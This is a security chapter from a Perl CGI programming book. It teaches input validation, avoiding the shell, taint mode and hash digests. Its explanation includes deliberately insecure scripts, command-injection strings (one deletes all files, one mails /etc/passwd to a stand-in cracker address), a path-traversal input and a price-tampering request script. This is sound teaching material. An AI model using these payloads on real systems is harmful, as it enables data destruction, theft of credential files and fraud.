Search the Catalog
CGI Programming with Perl, 2nd Edition

CGI Programming with Perl, 2nd Edition

By Scott Guelich, Shishir Gundavaram, and Gunther Birznieks
2nd Edition July 2000
1-56592-419-3, Order Number: 4193
472 pages, $34.95

Chapter 8
Security

CGI programming offers you something amazing: as soon as your script is online, it is immediately available to the entire world. Anyone from almost anywhere can run the application you created on your web server. This may make you excited, but it should also make you scared. Not everyone using the Internet has honest intentions. Crackers[1] may attempt to vandalize your web pages in order to show off to friends. Competitors or investors may try to access internal information about your organization and its products.

Not all security issues involve malevolent users. The worldwide availability of your CGI script means that someone may run your script under circumstances you never imagined and certainly never tested. Your web script should not wipe out files because someone happened to enter an apostrophe in a form field, but this is possible, and issues like these also represent security concerns.

The Importance of Web Security

Many CGI developers do not take security as seriously as they should. So before we look at how to make CGI scripts more secure, let's look at why we should worry about security in the first place:

  1. On the Internet, your web site represents your public image. If your web pages are unavailable or have been vandalized, that affects others' impressions of your organization, even if the focus of your organization has nothing to do with web technology.
  2. You may have valuable information on your web server. You may have sensitive or valuable information available in a restricted area that you may wish to keep unauthorized people from accessing. For example, you may have content or services available to paying members, which you would not want non-paying customers or non-members to access. Even files that are not part of your web server's document tree and are thus not available online to anyone (e.g., credit card numbers) could be compromised.
  3. Someone who has cracked your web server has easier access to the rest of your network. If you have no valuable information on your web server, you probably cannot say that about your entire network. If someone breaks into your web server, it becomes much easier for them to break into another system on your network, especially if your web server is inside your organization's firewall (which, for this reason, is generally a bad idea).
  4. You sacrifice potential income when your system is down. If your organization generates revenue directly from your web site, you certainly lose income when your system is unavailable. However, even if you do not fall into this group, you likely offer marketing literature or contact information online. Potential customers who are unable to access this information may look elsewhere when making their decision.
  5. You waste time and resources fixing problems. You must perform many tasks when your systems are compromised. First, you must determine the extent of the damage. Then you probably need to restore from backups. You must also determine what went wrong. If a cracker gained access to your web server, then you must determine how the cracker managed this in order to prevent future break-ins. If a CGI script damaged files, then you must locate and fix the bug to prevent future problems.
  6. You expose yourself to liability. If you develop CGI scripts for other companies, and one of those CGI scripts is responsible for a large security problem, then you may understandably be liable. However, even if it is your company for whom you're developing CGI scripts, you may be liable to other parties. For example, if someone cracks your web server, they could use it as a base to stage attacks on other companies. Likewise, if your company stores information that others consider sensitive (e.g., your customers' credit card numbers), you may be liable to them if that information is leaked.

These are only some of the many reasons why web security is so important. You may be able to come up with other reasons yourself. So now that you recognize the importance of creating secure CGI scripts, you may be wondering what makes a CGI script secure. It can be summed up in one simple maxim: never trust any data coming from the user. This sounds quite simple, but in practice it's not. In the remainder of this chapter, we'll explore how to do this.

Handling User Input

Security problems arise when you make assumptions about your data: you assume that users will do what you expect, and they surprise you. Users are good at this, even when they're not trying. To write secure CGI scripts, you must also think creatively. Let's look at an example.

Calling External Applications

figlet is a fun application that allows us to create large, fancy ASCII art characters in many different sizes and styles. You can find examples of figlet output as part of people's signatures in email messages and newsgroup posts. If figlet is not on your system, you can get it from http://st-www.cs.uiuc.edu/users/chai/figlet.html.

You can execute figlet from the command line in the following manner:

$ figlet -f fonts/slant 'I Love CGI!'

And the output would be:

    ____   __                       ________________  _  _
   /  _/  / /   ____ _   _____     / ____/ __  _  _/  _/ /
   / /   / /   / _  _ \ | / / _ \   / /   / / _  _ / // /
 _/ /   / /___/ /_/ / |/ /  __/  / /_  _  _/ /_/ // //_/
/___/  /_____/\____/|___/\___/   \____/\____/_  _  _(_)

We can write a CGI gateway to figlet that allows a user to enter some text, executes a command like the one shown above, captures the output, and returns it to the browser.

First, Example 8-1 shows the HTML form.

Example 8-1: figlet.html

<html>
  <head>
    <title>Figlet Gateway</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    
    <div align="center">
    <h2>Figlet Gateway</h2>
    
    <form action="/cgi/unsafe/figlet_INSECURE.cgi" method="GET">
      <p>Please enter a string to pass to figlet:
        <input type="text" name="string"></p>
      <input type="submit">
    </form>
  
  </body>
</html>

Now, Example 8-2 shows the program.

Example 8-2: figlet_INSECURE.cgi

#!/usr/bin/perl -w
 
use strict;
use CGI;
use CGIBook::Error;
 
# Constant: path to figlet
my $FIGLET = '/usr/local/bin/figlet';
 
my $q      = new CGI;
my $string = $q->param( "string" );
 
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}
 
local *PIPE;
 
## This code is INSECURE...
## Do NOT use this code on a live web server!!
open PIPE, "$FIGLET \"$string\" |" or
    die "Cannot open pipe to figlet: $!";
 
print $q->header( "text/plain" );
print while <PIPE>;
close PIPE;

We first verify that the user entered a string and simply print an error if not. Then we open a pipe (notice the trailing "|"character) to the figlet command, passing it the string. By opening a pipe to another application, we can read from it as though it is a file. In this case, we can get at the figlet output by simply reading from the PIPE file handle.

We then print our content type, followed by the figlet output. Perl lets us do this on one line: the while loop reads a line from PIPE, stores it in $_ , and calls print ; when print is called without an argument, it will output the value stored in $_ ; the loop automatically terminates when all the data has been read from figlet.

Admittedly, our example is somewhat dull. figlet has many options for changing the font, etc., but we want to keep our example short and simple to be able to focus on the security issues. Many people assume that it's hard for something to go wrong with scripts this simple. In fact, this CGI script allows a savvy user to execute any command on your system!

Before reading further, see if you can figure out how this example is insecure. Remember that your commands are executed with the same permissions that your web server runs as (e.g., nobody). If you want to test it on a web server, then only do so on a private web server that is not attached to the Internet! Finally, try to figure out how to fix this security problem.

The reason why we suggest that you try to find the solution yourself is that there are many possible solutions that appear secure but are not. Before we look at the solutions, let's analyze the problem. It should have been pretty obvious (if only from the comments in the code), that the culprit is the call that opens a pipe to figlet. Why is this insecure? Well, it isn't if the user does in fact pass simple words without punctuation. But if you assume this then you would be forgetting our rule: never trust any data from the user.

User Input and the Shell

You should not assume this field will contain harmless data. It could be anything. When Perl opens a pipe to an external program, it passes the command through a shell. Suppose the input were the text:

`rm -rf /`

or:

"; mail cracker@badguys.net </etc/passwd"

These commands would execute as if the following commands had been entered into a shell:

$ /usr/local/bin/figlet "`rm -rf /`"
$ /usr/local/bin/figlet ""; mail cracker@badguys.net </etc/passwd

The first command would attempt to erase every file on your server, leaving you to search for your backup tapes.[2] The second would email your system password file to someone you'd probably rather not have trying to log into your system. Windows servers are no better off; the input "| del /f /s /q c:\" would be just as catastrophic.

So what should we do? Well, the main problem is that the shell gives many characters special meaning. For example, the backtick character (`) allows you to embed one command inside another. This makes the shell powerful, but in this context, that power is dangerous. We could attempt to make a list of all the special characters. We would need to include all the characters that can cause other commands to run, that change the environment in significant ways, or terminate our intended commands and allow another command to follow.

We could change the code as follows:

my $q      = new CGI;
my $string = $q->param( "string" );
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}
 
## This is an incomplete example; this is NOT a secure check
if ( $string =~ /[`\$\\"';& ...  ] ) {
    error( $q,
        "Your text may not include these characters: `\$\\\"';& ..." );
}

This example is not complete, and we will not provide a full list of dangerous characters here. We won't create such a list because we do not trust that we will not miss something important, and that is why this is the wrong way to go about solving the problem. This solution requires you to know every possible way that the shell can execute a dangerous command. If you miss just one thing, you can be compromised.

Security Strategies

The right way is not to make a list of what to disallow. The right way is to make a list of what to allow. This makes the solution much more manageable. If you start by saying that anything goes and looking for those things that cause problems, you will spend a long time looking. There are countless combinations to check. If you say that nothing goes and then slowly add things, you can check each of these as you add them and confirm that nothing will slip past you. If you miss something, you have disallowed something you should allow, and you can correct the problem by testing it and adding it. This is a much safer way to error.

The final reason why this is the safer way to go is that security solutions should be simple. It's never a good idea to simply trust someone else who provides you a "definitive" list of something as important as dangerous shell characters to check against. You are the one who is accountable for your code, so you should fully understand why and how your code works, and not place blind faith in others.

So let's make a list of things to allow. We will allow letters, numbers, underscores, spaces, hyphens, periods, question marks, and exclamation points. That's a lot, and it should cover most of the strings that users try to convert. Let's also switch to single quotes around the argument to make things even safer. Example 8-3 provides a more secure version of our CGI script.

Example 8-3: figlet_INSECURE2.cgi

#!/usr/bin/perl -w
 
use strict;
use CGI;
use CGIBook::Error;
 
my $FIGLET = '/usr/local/bin/figlet';
 
my $q      = new CGI;
my $string = $q->param( "string" );
 
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}
 
unless ( $string =~ /^[\w .!?-]+$/ ) {
    error( $q, "You entered an invalid character. " .
               "You may only enter letters, numbers, " .
               "underscores, spaces, periods, exclamation " .
               "points, question marks, and hyphens." );
}
local *PIPE;
 
## This code is more secure, but still dangerous...
## Do NOT use this code on a live web server!!
open PIPE, "$FIGLET '$string' |" or
    die "Cannot open figlet: $!";
 
print $q->header( "text/plain" );
print while <PIPE>;
close PIPE;

This code is much better. It isn't dangerous in its current form. The only problem is that someone can come along at some later point and make minor changes that could render the script insecure again. Of course, we can't cover every possibility --we have to draw the line somewhere. So are we being too critical to say the script could be more secure? Perhaps, but it always best to be safer rather than sorry when dealing with web security. We can improve this script because there is a way to open a pipe to another process in Perl and bypass the shell altogether. All right, you say, so why didn't we say so in the first place? Unfortunately, this trick only works on those operating systems where Perl can fork, so this does not work on Win32[3] or MacOS, for example.

fork and exec

All we need to do is replace the command that opens the pipe with the following lines:

## Ahh, much safer
my $pid = open PIPE, "-|";
die "Cannot fork $!" unless defined $pid;
 
unless ( $pid ) {
    exec FIGLET, $string or die "Cannot open pipe to figlet: $!";
}

This uses a special form of the open function, which implicitly tells Perl to fork and create a child process with a pipe connected to it. The child process is a copy of the current executing script and continues from the same point. However, open returns a different value for each of the forked processes: the parent receives the process identifier (PID) of the child process; the child process receives 0. If open fails to fork, it returns undef.

After verifying that the command succeeded, the child process calls exec to run figlet. exec tells Perl to replace the child process with figlet, while keeping the same environment including the pipe to the parent process. Thus, the child process becomes figlet and the parent keeps a pipe to figlet, just as if it had used the simpler open command from above.

This is obviously a little more complicated. So why all this work if we still have to call figlet from exec? Well, if you look closely, you'll notice that exec takes multiple arguments in this script. The first argument is the name of the process to run, and the remaining arguments are passed as arguments to the new process, but Perl does this without passing them through the shell. Thus, by making our code a little more complex, we can avoid a big security problem.

Trusting the Browser

Let's look at another common security mistake in CGI scripts. You may think that the only data coming from the user you have to validate is the data they are allowed to edit. For example, you might think that data embedded in hidden fields or select lists is safer than data in text fields because the browser doesn't allow users to edit them. Actually, these can be just as dangerous. Let's see why.

In this example, we'll look at a simple online software store. Here, each product has its own static HTML page and each page calls the same CGI script to processes the transaction. In order to make the CGI script as flexible as possible, it takes the product name, quantity, and price from hidden fields in the product page. It then collects the user's credit card information, charges the card for the full amount, and allows the user to download the software.

Example 8-4 shows a sample product page.

Example 8-4: sb3000_INSECURE.html

<html>
  <head>
    <title>Super Blaster 3000</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    <h2>Super Blaster 3000</h2>
    <hr>
    
    <form action="https://localhost/cgi/buy.cgi" method="GET">
      <input type="hidden" name="price" value="30.00">
      <input type="hidden" name="name" value="Super Blaster 3000">
      
      <p>Experience Super Blaster 3000, the hot new game that 
        everyone is talking about! You can't find it in stores, so
        order your copy here today. Just a quick download and you 
        can be playing it all night!</p>
      
      <p>The price is $30.00 (USD) per license. Enter the number
        of licenses you want, then click the <i>Order</i> button to 
        enter your order information.</p>
      
      <p>Number of Licenses: 
        <input type="text" name="quantity" value="1" size="8"></p>
      <input type="submit" name="submit" value="Order">
      
    </form>
  </body>
</html>

We don't need to look at the CGI script in this example, because the problem isn't what it does, it's how it's called. For now, we're interested in the form, and the security problem here is the price. The price is in a hidden field, so the form should not allow users to change the price. You may have noticed, however, that because the form is submitted via GET, the parameters will be clearly visible in the URL in your browser window. The previous example with one license generates the following URL (ignore the line break):

https://localhost/cgi/buy.cgi?price=30.00&
name=Super+Blaster+3000&quantity=1&submit=Order

By modifying this URL, it is possible to change the price to anything and call the CGI script with this new value.

Do not be deceived into thinking that you can solve this problem by changing the request method to POST. Many web developers use POST even when it is not appropriate (see "GET versus POST" in Chapter 2, The Hypertext Transport Protocol) because they believe it makes their scripts more secure against URL tampering. This is false security. First of all, CGI.pm, like most modules that parse form input, does not differentiate between data obtained via POST or GET. Just because you change your form to call the script via POST does not mean that the user cannot manually construct a query string to call your script via GET instead. To prevent this, you could insert code like this:

unless ( $ENV{REQUEST_METHOD} eq "POST" ) {
    error( $q, "Invalid request method." );
}

However, the user can always copy your form to their own system. Then they can change the price to be an editable text field in their copy of the form and submit it to your CGI. Nothing inherent to HTTP prevents an HTML form on one server from calling a CGI script on another server. In fact, a CGI script can not reliably determine what form was used to submit data to it. Many web developers attempt to use the HTTP_REFERER environment variable to check where form input came from. You can do so like this:

my $server = quotemeta( $ENV{HTTP_HOST} || $ENV{SERVER_NAME} );
unless ( $ENV{HTTP_REFERER} =~ m|^https?://$server/| ) {
    error( $q, "Invalid referring URL." );
}

The problem here is that you have gone from trusting the user to trusting the user's browser. Don't do this. If the user is surfing with Netscape or Internet Explorer, you may be okay. It is possible that a bug could cause the browser to send the wrong referring URL, but this is unlikely. However, whoever said that users had to use one of these browsers?

There are many web browsers available, and some are far more configurable than Netscape and Internet Explorer. Did you know that Perl even has its own web client of sorts? The LWP module allows you to create and send HTTP requests easily from within Perl. The requests are fully customizable, so you can include whatever HTTP headers you wish, including Referer and User-Agent. The following code would allow someone to easily bypass all the security checks we've listed earlier:

#!/usr/bin/perl -w
 
use strict;
 
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use CGI;
 
my $q = new CGI( {
    price    => 0.01,
    name     => "Super Blaster 3000",
    quantity => 1,
    submit   => "Order",
} );
 
my $form_data = $q->query_string;
 
my $headers = new HTTP::Headers(
    Accept       => "text/html, text/plain, image/*",
    Referer      => "http://localhost/products/sb3000.html",
    Content_Type => "application/x-www-form-urlencoded"
);
 
my $request = new HTTP::Request(
    "POST",
    "http://localhost/cgi/feedback.cgi",
    $headers
);
 
$request->content( $form_data );
 
my $agent = new LWP::UserAgent;
$agent->agent( "Mozilla/4.5" );
my $response = $agent->request( $request );
 
print $response->content;

We're not going to review how this code works now, although we'll discuss LWP in Chapter 14, Middleware and XML. Right now, the important thing to understand is that you can't trust any data that comes from the user, and you can't trust the browser to protect you from the user. It's trivially easy for someone with a little knowledge and a little ingenuity to provide you with any input they want.

Encryption

Encryption can be an effective tool when developing secure solutions. There are two scenarios where it is especially useful for web applications. The first is to protect sensitive data so that it cannot be intercepted and viewed by others. A secure https connections using SSL (or TLS) provides this protection. The second scenario involves validation, such as ensuring that the user has not tampered with the values of hidden fields in a form. This is handled by generating hashes, or digests, that can be used like checksums to verify that the data matches what is expected.

You could use a hash algorithm, such as MD5 or SHA-1, to secure Example 8-3. You would do this by generating a digest for both the data on the page--the product name and price--and a secret phrase stored on the server:

use constant $SECRET_PHRASE => "ThIs phrAsE ShOUld bE DiFFiCUlT 2 gueSS.";
my $digest = generate_digest( $name, $price, $SECRET_PHRASE );

You could then insert the value of the digest into your form as an additional hidden field, as shown in Example 8-5.

Example 8-5: sb3000.html

<html>
  <head>
    <title>Super Blaster 3000</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    <h2>Super Blaster 3000</h2>
    <hr>
    
    <form action="https://localhost/cgi/buy.cgi" method="GET">
      <input type="hidden" name="price" value="30.00">
      <input type="hidden" name="name" value="Super Blaster 3000">
      <input type="hidden" name="digest"
        value="a38b37b5c80a79d2efb31ad78e9b8361">
      .
      .

When the CGI script receives the input, it recalculates a digest from the product's name and price along with the secret phrase. If it matches the digest that was supplied from the form, then the user has not modified the data.

The value of your secret phrase must not be easy to guess, and it should be protected on your server. Like passwords and other sensitive data, you may wish to place your secret phrase in a file outside of your CGI directory and document root and have your CGI scripts read this value when it is needed. This way, if a misconfiguration in your web server allows users to view the source of your CGI scripts, then your secret phrase would not be compromised.

In this example, the simplest solution may be to simply look up the prices on the server and not pass them through hidden fields, but there are certainly circumstances when you must expose data like this, and digests are an effective way to verify your data.

Now let's look at how to actually generate digests. We will look at two algorithms: MD5 and SHA-1.

MD5

MD5 is a 128-bit, one-way hash algorithm. It produces a short message digest for your data that is extremely unlikely to be produced for other data. However, from a digest it is not possible to derive the original data. The Digest::MD5 module allows you to create MD5 digests in Perl.[4]

The digest that Digest::MD5 generates for you is available in three different formats: as raw binary data, converted to hexadecimal, and converted to Base64 format. The latter two formats produce longer strings, but they can be safely inserted within HTML, email, etc. The hexadecimal digest is 32 characters; the Base64 digest is 22 characters. Base64 encoding uses characters A-Z, a-z, 0-9, +, /, and =.

You can use the Digest::MD5 module this way to generate a hexadecimal digest:

use Digest::MD5 qw( md5_hex );
my $hex_digest = md5_hex( @data );

You can use the Digest::MD5 module this way to generate a Base64 digest:

use Digest::MD5 qw( md5_base64 );
my $base64_digest = md5_base64( @data );

It is still possible for someone who has a digest and who knows possible original values to generate digests for each of the possible values to compare against the target digest. Thus, if you wish to generate digests that cannot be guessed, you should supply data that varies enough to not be predictable.

The MD5 algorithm has received criticism within the last few years because researchers discovered internal weaknesses, which may make it easier to find different sets of data that produce the same digest. No one has done this, because it is still quite challenging, but the challenge looks smaller than previously assumed, and it may happen in the near future. This does not mean that it is any easier for someone to generate the original data from a digest, only that it may eventually be possible to calculate other data that collides with the digest. The SHA-1 algorithm does not currently have this problem.

SHA-1

Digest::SHA1, which is included in Digest::MD5, provides an interface to the 160-bit SHA-1 algorithm. It is considered more secure than MD5, but it does take longer to generate. You can use it just like Digest::MD5:

use Digest::SHA1 qw( sha1_hex sha1_base64 );
my $hex_digest    = sha1_hex( @data );
my $base64_digest = sha1_base64( @data );

Hexadecimal SHA-1 digests are 40 characters; Base64 digests are 27 characters.

Perl's Taint Mode

If you have been paying close attention, you may have noticed that the example scripts in this chapter are all a little different from previous examples. The difference appears at the end of the first line. All of our prior examples have had this as the first line:

#!/usr/bin/perl -wT

In this chapter, they have started like this:

#!/usr/bin/perl -w

The difference is the -T option, which enables Perl's taint mode. Taint mode tells Perl to keep track of data that comes from the user and avoid doing anything insecure with it. Because our examples this chapter intentionally showed insecure ways of doing things, they wouldn't have worked with the -T flag, thus we omitted it. From this it should be clear, however, that taint mode is generally a very good thing.

The purpose of taint mode is to not allow any data from outside your application from affecting anything else external to your application. Thus, Perl will not allow user-inputted values to be used in an eval, passed through a shell, or used in any of the Perl commands that affect external files and processes. It was created for situations when security is important, such as writing Perl programs that run as root or CGI scripts. You should always use taint mode in your CGI scripts.

How Taint Works

When taint mode is enabled, Perl monitors every variable to see if it is tainted. Tainted data, according to Perl, is any data that comes from outside your code. Because this includes anything read from STDIN (or any other file input) as well as all environment variables, this covers everything your CGI script receives from the user.

Not only does Perl keep track of whether variables are tainted or not, but that taintedness follows the data in the variable around if you try to assign it to another variable. For example, because it is an environment variable, Perl considers the HTTP request method stored in $ENV{REQUEST_METHOD} to be tainted. If you then assign this to another variable, that variable also becomes tainted.

my $method = $ENV{REQUEST_METHOD};

Here $method also becomes tainted. It does not matter whether the expression simple or complex. If a tainted value is used in an expression, then the result of that expression is also tainted, and any variable it is assigned to will also become tainted.

You can use this subroutine to test whether a variable is tainted.[5] It returns a true or false value:

sub is_tainted {
    my $var = shift;
    my $blank = substr( $var, 0, 0 );
    return not eval { eval "1 || $blank" || 1 };
}

We set $blank to a zero-length substring of the variable we're testing. If the value is tainted and we are running in taint mode, Perl will throw an error when we evaluate this in the quoted expression on the following line. This error is caught by the outer eval, which then returns undef. If the variable is not tainted or we are not running in taint mode, then the expression within the outer eval evaluates to 1. The not reverses the resulting values.

What Is Monitored by Taint Mode

One of the great benefits of using taint mode is that you don't have to try to understand all the technical details about how Perl's guts do the work. As we have seen, Perl sometimes passes expressions through an external shell to help it interpret arguments to system calls. There are even more subtle situations when Perl will invoke a shell, but you don't need to worry about mapping all of these instances out, because taint mode recognizes them for you.

The basic rule, as we have said, is that Perl considers any action that could modify resources outside the script subject to enforcement. Thus, you may open a file using a tainted filename and read from it as long as you did so in read-only mode. However, if you try to open the file to write to it, using a tainted filename, Perl will abort with an error.

How Taintedness Is Removed

Taint mode would be much too restrictive if there was no way to untaint your data. Of course, you do not want to untaint data without checking it to verify that it is safe. Fortunately, one command can accomplish both of these tasks. It turns out that Perl does allow one expression involving tainted values to evaluate to an untainted value. If you match a variable with a regular expression, then the pattern match variables that correspond to the matched parentheses (e.g., $1, $2, etc.) are untainted. If, for example, you wanted to get a particular filename for the user while making sure that it doesn't include a full path (so the user cannot write to a file outside the directory you are intending), you could untaint the user input this way:

$q->param( "filename" ) =~ /^([\w+.])$/;
my $filename = $1;
 
unless ( $filename ) {
    .
    .
    .

You can reduce the first two lines to one line because a regular expression match returns a list of matches, and these are also untainted:

my( $filename ) = $q->param( "filename" ) =~ /^([\w.])$/;
 
unless ( $filename ) {
    .
    .
    .

You have seen this notation previously in many of our examples. Note that because the result of the regular expression is a list, you must include parentheses around $filename to evaluate it in a list context. Otherwise, $filename will be set to the number of successful parenthesized matches (1 in this case).

Allowing versus disallowing

Remember what we said previously. It is generally better to determine what characters to allow than to try to determine what not to allow. Build your untaint regular expressions with this in mind. In this example, we only allowed letters, numbers, underscores, and periods in the filename, which is much simpler than scanning against possible file path delimiters.

Why Use Taint Mode?

Perl's taint mode doesn't do anything for you that you can't do for yourself. It simply monitors the data and stops you if you're in danger of shooting yourself in the foot. You could be careful on your own, but it certainly helps to have Perl do its best to help. In general, the best argument for using taint mode is simply turn the question around and ask "Why not use taint mode?"

Many CGI developers can come up with excuses for not using taint mode, but none of them really hold water. Some may find it too difficult or complicated to deal with the restrictions that taint mode imposes. This is generally because they don't fully understand how taint mode works and they find it easier to turn it off than to learn how to fix the problems Perl is trying to point out (see the next section for some help).

Other developers may argue that taint mode slows their scripts down more than they can afford. Believe it or not, taint mode does not significantly slow down your scripts. If you are concerned about performance, don't implicitly assume that taint mode must slow down your code. Use the Benchmark module and test the difference; you may be surprised at the results. We'll discuss how to use the Benchmark module in Chapter 17, Efficiency and Optimization.

The final reason to use taint mode is that CGI scripts rarely remain unchanged. Bugs are fixed, new features are added, and even though the original code may have been perfectly safe, someone may accidentally change all that. You can think of taint mode as an ongoing security audit that Perl provides for free.

Common Problems with Taint Mode

When you first start working with taint mode, it can be annoying because it seems to complain about everything. Of course, once you have gained a little experience, you learn what to watch out for and begin to write safe code without having to think about it.

Here are some basic tips to help you with the major problems you will first encounter:

It's common to add something like these two lines to CGI scripts running in taint mode (the PATH you choose may vary depending on your needs and your system):

$ENV{PATH} = "/bin:/usr/bin";
delete @ENV{ 'IFS', 'CDPATH', 'ENV', 'BASH_ENV' };

Data Storage

There are a number of security issues specifically related to reading and writing data. We'll discuss data storage in much greater detail in Chapter 10, Data Persistence. Let's review the security issues now.

Dynamic Filenames

You should be extra careful when opening files where the filename is dynamically generated based upon user input. For example, you may have data arranged according to date, with a separate directory for each year and a separate file for each month. If you have a CGI script that allows the user to search for records in this file according to month and year, you would not want to use this code:

#!/usr/bin/perl -wT
 
use strict;
use CGI;
use CGIBook::Error;
 
my $q = new CGI;
my @missing;
 
my $month = $q->param( "month" ) or push @missing, "month";
my $year  = $q->param( "year"  ) or push @missing, "year";
my $key   = quotemeta( $q->param( "key" ) ) or push @missing, "key";
 
if ( @missing ) {
    my $fields = join ", ", @missing;
    error( $q, "You left the following required fields blank: $fields."  );
}
 
local *FILE;
 
## This is INSECURE unless you first check the validity of $year and $month
open FILE, "/usr/local/apache/data/$year/$month" or
    error( $q, "Invalid month or year" );
 
print $q->header( "text/html" ),
      $q->start_html( "Results" ),
      $q->h1( "Results" ),
      $q->start_pre;
 
while (<FILE>) {
    print if /$key/;
}
 
print $q->end_pre,
      $q->end_html;

Any user who supplied "../../../../../etc/passwd" as a month could browse /etc/passwd --probably not a feature you want to provide. Assuming that your web form passes two-digit numbers for months and days, you should add the following lines:

unless ( $year =~ /^\d\d$/ and $month =~ /^\d\d$/ ) {
    error( $q, "Invalid month or year" );
}

You may have noticed that taint mode is enabled and wondered why it did not catch this security problem. Remember, the function of taint mode is to not allow you to accidentally use data that comes from outside your program to change resources outside your program. This code does not attempt to change any outside resources, so taint mode sees no reason to stop the script from reading /etc/passwd. Taint mode will only stop you from opening a file with an user-supplied filename if you are opening the file to write to it.

In this example, we were reading from a text file, but this security issue applies to other forms of data storage too. We could have just as easily been reading from a DBM file instead. Likewise when you use a RDBMS, you must specify what database you wish to connect to, and it is very poor design to allow the user to specify what database to open and read.

Location of Files

Your data files should not be directly browsable by the user, so they should not be in the web server's document tree. This is a mistake people frequently make when installing third party web applications. Many freely available web applications are distributed with all of their files--including configuration files that contain important data like administrative passwords--in one directory to make them easy to install. If you install the application as it comes packaged, then anyone who is familiar with the application can access the configuration information and possibly exploit it. Often these applications allow you to change filenames relatively easily, so some developers try to hide important data files by renaming them from their default name to a more obscure name. A much better solution is to move them out of the web document tree altogether.

Unless you store all of your data in an RDBMS, you should have a standard data tree just like your web document tree where you can store all your application data. Give each web application a subdirectory under the root data directory. Do not configure the web server to serve files out of this directory. In our examples, we use /usr/local/apache/data as the root of our data tree.

File Permissions

You should use your web server's filesystem to help you control read and write access to data files. On Unix systems, each directory and file has an owner, a group, and a set of permissions. The web server also runs as a particular user and group, such as nobody.

The web server should not have write access to any file it doesn't need to write to. This simple guideline may sound obvious, but it is often ignored in practice.

Data files that your scripts only need to read should be owned by nobody, and they should have a restrictive file permission like 0644. If the web server needs to be able to write to a file and it is not the creator of the file, you may want to set the group of the file to nobody and enable the group write bit by setting its permission to 0664.

If the web server needs to be able to create files or subdirectories within a directory, then that directory must be writable. Assign its group to nobody and change the permissions to 0775; otherwise, directories should be 0755. Realize that if you make a directory writable, then existing files can be deleted or replaced even if these files themselves are read-only.

Summary

If you remember one thing from this chapter, it should be that you should never trust the user or the browser. Always double-check your input, avoid the shell, and use taint mode. Also, your system should be designed so that if crackers do break into your web server, they do not gain much. Web servers are frequent targets because they are the most visible system a company has, as well as the most easy to break into (though following the suggestions in this chapter certainly helps). Therefore, do not store important data (e.g., unencrypted credit card numbers) on the machine. Likewise, avoid creating trust relationships between the web server and other machines. Your network should be configured so that someone who manages to crack into your web server should not have easy access to the rest of your network.


1. A cracker is someone who attempts to break into computers, snoop network transmissions, and get into other forms of online mischief. This is quite different from a hacker, a clever programmer who can find creative, simple solutions to problems. Many programmers (most of whom consider themselves hackers) draw a sharp distinction between the two terms, even though the mainstream media often does not.

2. This example shows you why it is important to create a special user like nobody to run your web server and why this user should own as few files as possible. See "Getting Started" in Chapter 1.

3. As this book was going to press, the most recent versions of ActiveState Perl supported fork on Win32.

4. You may also see references to the MD5.pm module; MD5.pm is deprecated and is now only a wrapper to the Digest::MD5 module.

5. The perlsec manpage suggests a subroutine that uses Perl's kill function to test for taintedness. Unfortunately, the kill function is not supported by many systems. The subroutine provided here should work on any platform.

Back to: CGI Programming with Perl, 2nd Edition


O'Reilly Home | O'Reilly Bookstores | How to Order | O'Reilly Contacts
International | About O'Reilly | Affiliated Companies

© 2001, O'Reilly & Associates, Inc.
webmaster@oreilly.com